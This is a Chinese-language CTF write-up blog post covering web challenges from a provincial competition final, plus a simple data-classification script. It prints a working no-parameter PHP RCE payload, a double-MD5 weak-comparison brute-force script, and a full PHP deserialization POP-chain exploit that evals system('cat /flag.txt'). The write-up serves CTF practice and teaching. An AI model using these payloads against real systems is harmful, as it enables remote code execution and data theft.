省赛决赛wp

发布于 23 天前  1058 次阅读


省赛决赛

上次就已经很史了,决赛这次更史,出的很没水平,点名批评web1,谜语人就算了,静态靶机限制频率你封我1小时666比赛总共就六小时,一开始爆个密码被封了一小时,做了其他两道web回来随便搞了两下又封了一小时,做你*

web

wucanRCE

见名知义,无参RCE,直接用get_defined_vars:

?c=eval(end(pos(get_defined_vars())));&a=system("cat ../f*");

unserialize

简陋的php反序列化,走的流程是:

AAA # __destruct
AAA # __toString
GGG # __invoke
EEE # __get

invoke这里是一个弱类型比较:

public function __invoke(){
    if(md5(md5($this -> book)) == 666) {   
        return $this -> green -> pen;
    }
}

直接写脚本爆个md5为666开头,第四个是不为e的字母的字符串即可。

import hashlib
def md5(a):
    b=hashlib.md5()
    b.update(a.encode())
    return b.hexdigest()
print(md5("123"))

dic = "1234567890poiuytrewqasdfghjklmnbvcxz"
for a in dic:
    for b in dic:
        for c in dic:
            for d in dic:
                for e in dic:
                    hash = md5(md5(a+b+c+d+e))
                    print(f"TEST : {hash}")
                    if hash[0:3:]=="666" and hash[3] in "poiuytrwqasdfghjklmnbvcxz":
                        print(f"success!原值:{a+b+c+d+e} 哈希:{hash}")
                        exit(114514)

得到值11h7g
最后一个绕:

class EEE{
    public $d=array();
    public $e;
    public $f='system("cat /flag.txt");';
    public function __get($arg1){
        $this->d[$this->e]=1;
        if ($this->d[]=1){
            echo 'nononononnnn!!!';
            }
        else{
            eval($this->f);
            }
    }
}

这里出题人自作聪明,随便给d改个123就绕了
exp:

<?php
highlight_file(__FILE__);
error_reporting(0);
class AAA{
    public $aear;
    public $string;
    public function __construct($a){
        $this -> aear = $a;
    }
    function __destruct()
    {
        echo "11111";
        echo $this -> aear;
    }
    public function __toString()
    {
        $new = $this -> string;
        return $new();
    }

}

class BBB {
    private $pop;

    public function __construct($string) {
        $this -> pop = $string;
    }

    public function __get($value) {
        $var = $this -> $value;
        $var[$value]();
    }
}

class DDD{
    public $bag;
    public $magazine;

    public function __toString()
    {
        $length = @$this -> bag -> add();
        return $length;
    }
    public function __set($arg1,$arg2)
    {
        if($this -> magazine -> tower)
        {
            echo "really??";
        }
    }
}

class EEE{
    public $d=123;
    public $e;
    public $f='system("cat /flag.txt");';
    public function __get($arg1){
        $this->d[$this->e]=1;
        if ($this->d[]=1){
            echo 'nononononnnn!!!';
            }
        else{
            eval($this->f);
            }
    }
}

class FFF{
    protected $cookie;

    protected function delete() {
        return $this -> cookie;
    }

    public function __call($func, $args) {
        echo 'hahahhhh';
        call_user_func([$this, $func."haha"], $args);
    }
}
class GGG{
    public $green;
    public $book;
    public function __invoke(){
        if(md5(md5($this -> book)) == 666) {   
            return $this -> green -> pen;
        }
    }
}

if(isset($_POST['UP'])) {
    unserialize($_POST['UP']);
}

$a2 = new AAA(1);
$g = new GGG();
$g -> book = "11h7g";
$e = new EEE();

$g -> green = $e;
$a2 -> string = $g;
$a1 = new AAA($a2);
echo serialize($a1);

数据安全

datasecurity_classify1

直接按长度推断数据类型即可

f = open("1.txt",encoding="utf-8")
lines = f.readlines()
print(lines)
for i in range(len(lines)):
    lines[i]=lines[i].replace("\n","")
print(lines)

f.close()
f1 = open("2.txt",'w+',encoding="utf-8")
for line in lines:
    if len(line)<=6:
        data = f"姓名,{line}\n"
    elif len(line)<18:
        data=f"手机号,{line}\n"
    else:
        data=f"身份证号,{line}\n"
    f1.write(data)
f1.close()

第二题到最后还是要写正则,三个人都不会,不出网直接g了,最后正确率也只有%68
后来发现是忘记去重,而且匹配电话号码用的是匹配11位数字,把身份证号也匹配进去了
丑完了。。。

A web ctfer from 0RAYS
最后更新于 2024-11-11